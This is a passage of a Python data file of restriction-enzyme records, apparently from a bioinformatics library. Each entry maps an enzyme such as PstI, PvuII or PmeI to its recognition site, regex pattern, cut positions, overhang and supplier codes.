'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PinP23II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAGNAG'),
'compsite': '(?=(?P<PinP59III>GAAG.AG))|(?=(?P<PinP59III_as>CT.CTTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGNAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PinP59III'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCNGC'),
'compsite': '(?=(?P<PkrI>GC.GC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PkrI'] = _temp()
def _temp():
return {
'charac': (27, 19, None, None, 'CATCAG'),
'compsite': '(?=(?P<PlaDI>CATCAG))|(?=(?P<PlaDI_as>CTGATG))',
'dna': None,
'freq': 4096.0,
'fst3': 19,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PlaDI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CGATCG'),
'compsite': '(?=(?P<Ple19I>CGATCG))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGATCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Ple19I'] = _temp()
def _temp():
return {
'charac': (9, 5, None, None, 'GAGTC'),
'compsite': '(?=(?P<PleI>GAGTC))|(?=(?P<PleI_as>GACTC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PleI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGCCGAC'),
'compsite': '(?=(?P<PliMI>CGCCGAC))|(?=(?P<PliMI_as>GTCGGCG))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCCGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PliMI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GGCGCC'),
'compsite': '(?=(?P<PluTI>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'GCGC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PluTI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTG'),
'compsite': '(?=(?P<PmaCI>CACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['PmaCI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GTTTAAAC'),
'compsite': '(?=(?P<PmeI>GTTTAAAC))',
'dna': None,
'freq': 65536.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTTTAAAC',
'size': 8,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PmeI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTG'),
'compsite': '(?=(?P<PmlI>CACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PmlI'] = _temp()
def _temp():
return {
'charac': (-7, -24, 25, 8, 'GAACNNNNNCTC'),
'compsite': '(?=(?P<PpiI>GAAC.....CTC))|(?=(?P<PpiI_as>GAG.....GTTC))',
'dna': None,
'freq': 16384.0,
'fst3': -24,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 8,
'scd5': 25,
'site': 'GAACNNNNNCTC',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PpiI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGCRGAC'),
'compsite': '(?=(?P<PpiP13II>CGC[AG]GAC))|(?=(?P<PpiP13II_as>GTC[CT]GCG))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCRGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PpiP13II'] = _temp()
def _temp():
return {
'charac': (9, 5, None, None, 'GAGTC'),
'compsite': '(?=(?P<PpsI>GAGTC))|(?=(?P<PpsI_as>GACTC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PpsI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ATGCAT'),
'compsite': '(?=(?P<Ppu10I>ATGCAT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGCAT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Ppu10I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'YACGTR'),
'compsite': '(?=(?P<Ppu21I>[CT]ACGT[AG]))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YACGTR',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Ppu21I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RGGWCCY'),
'compsite': '(?=(?P<PpuMI>[AG]GG[AT]CC[CT]))',
'dna': None,
'freq': 2048.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGGWCCY',
'size': 7,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PpuMI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACATGT'),
'compsite': '(?=(?P<PscI>ACATGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACATGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PscI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'RCCGAAG'),
'compsite': '(?=(?P<Pse18267I>[AG]CCGAAG))|(?=(?P<Pse18267I_as>CTTCGG[CT]))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'RCCGAAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pse18267I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GACNNNNGTC'),
'compsite': '(?=(?P<PshAI>GAC....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNGTC',
'size': 10,
'substrat': 'DNA',
'suppl': ('K', 'N'),
}
rest_dict['PshAI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATTAAT'),
'compsite': '(?=(?P<PshBI>ATTAAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATTAAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['PshBI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TTATAA'),
'compsite': '(?=(?P<PsiI>TTATAA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTATAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['PsiI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCGAAG'),
'compsite': '(?=(?P<Psp0357II>GCGAAG))|(?=(?P<Psp0357II_as>CTTCGC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Psp0357II'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GGWCC'),
'compsite': '(?=(?P<Psp03I>GG[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Psp03I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GAGCTC'),
'compsite': '(?=(?P<Psp124BI>GAGCTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'AGCT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Psp124BI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'AACGTT'),
'compsite': '(?=(?P<Psp1406I>AACGTT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AACGTT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Psp1406I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RGGWCCY'),
'compsite': '(?=(?P<Psp5II>[AG]GG[AT]CC[CT]))',
'dna': None,
'freq': 2048.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGGWCCY',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Psp5II'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CCWGG'),
'compsite': '(?=(?P<Psp6I>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCWGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Psp6I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTG'),
'compsite': '(?=(?P<PspCI>CACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['PspCI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGTNACC'),
'compsite': '(?=(?P<PspEI>GGT.ACC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTNAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTNACC',
'size': 7,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['PspEI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCCAGC'),
'compsite': '(?=(?P<PspFI>CCCAGC))|(?=(?P<PspFI_as>GCTGGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCAGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PspFI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CCWGG'),
'compsite': '(?=(?P<PspGI>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCWGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PspGI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGTACG'),
'compsite': '(?=(?P<PspLI>CGTACG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGTACG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PspLI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GGNNCC'),
'compsite': '(?=(?P<PspN4I>GG..CC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNNCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PspN4I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGGCCC'),
'compsite': '(?=(?P<PspOMI>GGGCCC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGCCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N', 'V'),
}
rest_dict['PspOMI'] = _temp()
def _temp():
return {
'charac': (27, 18, None, None, 'CGCCCAR'),
'compsite': '(?=(?P<PspOMII>CGCCCA[AG]))|(?=(?P<PspOMII_as>[CT]TGGGCG))',
'dna': None,
'freq': 8192.0,
'fst3': 18,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCCCAR',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PspOMII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGNCC'),
'compsite': '(?=(?P<PspPI>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['PspPI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RGGWCCY'),
'compsite': '(?=(?P<PspPPI>[AG]GG[AT]CC[CT]))',
'dna': None,
'freq': 2048.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGGWCCY',
'size': 7,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PspPPI'] = _temp()
def _temp():
return {
'charac': (21, 13, None, None, 'CCYCAG'),
'compsite': '(?=(?P<PspPRI>CC[CT]CAG))|(?=(?P<PspPRI_as>CTG[AG]GG))',
'dna': None,
'freq': 2048.0,
'fst3': 13,
'fst5': 21,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCYCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PspPRI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'VCTCGAGB'),
'compsite': '(?=(?P<PspXI>[ACG]CTCGAG[CGT]))',
'dna': None,
'freq': 7281.777777777777,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TCGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'VCTCGAGB',
'size': 8,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['PspXI'] = _temp()
def _temp():
return {
'charac': (-7, -25, 25, 7, 'GAACNNNNNNTAC'),
'compsite': '(?=(?P<PsrI>GAAC......TAC))|(?=(?P<PsrI_as>GTA......GTTC))',
'dna': None,
'freq': 16384.0,
'fst3': -25,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 7,
'scd5': 25,
'site': 'GAACNNNNNNTAC',
'size': 13,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PsrI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'RGGNCCY'),
'compsite': '(?=(?P<PssI>[AG]GG.CC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGGNCCY',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PssI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CNYACAC'),
'compsite': '(?=(?P<Pst14472I>C.[CT]ACAC))|(?=(?P<Pst14472I_as>GTGT[AG].G))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CNYACAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pst14472I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTAMRAG'),
'compsite': '(?=(?P<Pst145I>CTA[AC][AG]AG))|(?=(?P<Pst145I_as>CT[CT][GT]TAG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTAMRAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pst145I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GATCGAG'),
'compsite': '(?=(?P<Pst273I>GATCGAG))|(?=(?P<Pst273I_as>CTCGATC))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATCGAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pst273I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CTGCAG'),
'compsite': '(?=(?P<PstI>CTGCAG))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGCAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['PstI'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'CAGNNNCTG'),
'compsite': '(?=(?P<PstNI>CAG...CTG))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAGNNNCTG',
'size': 9,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PstNI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'BBCGD'),
'compsite': '(?=(?P<PsuGI>[CGT][CGT]CG[AGT]))|(?=(?P<PsuGI_as>[ACT]CG[ACG][ACG]))',
'dna': None,
'freq': 37.925925925925924,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'BBCGD',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PsuGI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RGATCY'),
'compsite': '(?=(?P<PsuI>[AG]GATC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGATCY',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PsuI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GACNNNGTC'),
'compsite': '(?=(?P<PsyI>GAC...GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNGTC',
'size': 9,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PsyI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCGCGC'),
'compsite': '(?=(?P<PteI>GCGCGC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CGCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGCGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PteI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CGATCG'),
'compsite': '(?=(?P<PvuI>CGATCG))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGATCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['PvuI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CAGCTG'),
'compsite': '(?=(?P<PvuII>CAGCTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAGCTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['PvuII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CACGAGH'),
'compsite': '(?=(?P<Rba2021I>CACGAG[ACT]))|(?=(?P<Rba2021I_as>[AGT]CTCGTG))',
'dna': None,
'freq': 5461.333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGAGH',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Rba2021I'] = _temp()
def _temp():
return {
'charac': (27, 18, None, None, 'CATCGAC'),
'compsite': '(?=(?P<RceI>CATCGAC))|(?=(?P<RceI_as>GTCGATG))',
'dna': None,
'freq': 16384.0,
'fst3': 18,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATCGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['RceI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCGCAG'),
'compsite': '(?=(?P<RdeGBI>CCGCAG))|(?=(?P<RdeGBI_as>CTGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['RdeGBI'] = _temp()
def _temp():
return {
'charac': (26, 18, None, None, 'ACCCAG'),
'compsite': '(?=(?P<RdeGBII>ACCCAG))|(?=(?P<RdeGBII_as>CTGGGT))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['RdeGBII'] = _temp()
def _temp():
return {
'charac': (-9, -17, 17, 9, 'TGRYCA'),
'compsite': '(?=(?P<RdeGBIII>TG[AG][CT]CA))',
'dna': None,
'freq': 1024.0,
'fst3': -17,
'fst5': -9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': 9,
'scd5': 17,
'site': 'TGRYCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['RdeGBIII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGCCAG'),
'compsite': '(?=(?P<RflFIII>CGCCAG))|(?=(?P<RflFIII_as>CTGGCG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['RflFIII'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GCGATCGC'),
'compsite': '(?=(?P<RgaI>GCGATCGC))',
'dna': None,
'freq': 65536.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGATCGC',
'size': 8,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['RgaI'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'GGCCGGCC'),
'compsite': '(?=(?P<RigI>GGCCGGCC))',
'dna': None,
'freq': 65536.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCCGGCC',
'size': 8,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['RigI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'VCW'),
'compsite': '(?=(?P<RlaI>[ACG]C[AT]))|(?=(?P<RlaI_as>[AT]G[CGT]))',
'dna': None,
'freq': 10.666666666666666,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'VCW',
'size': 3,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['RlaI'] = _temp()
def _temp():
return {
'charac': (26, 18, None, None, 'ACACAG'),
'compsite': '(?=(?P<RlaII>ACACAG))|(?=(?P<RlaII_as>CTGTGT))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACACAG',
'size': 6,
'substrat': 'DNA',
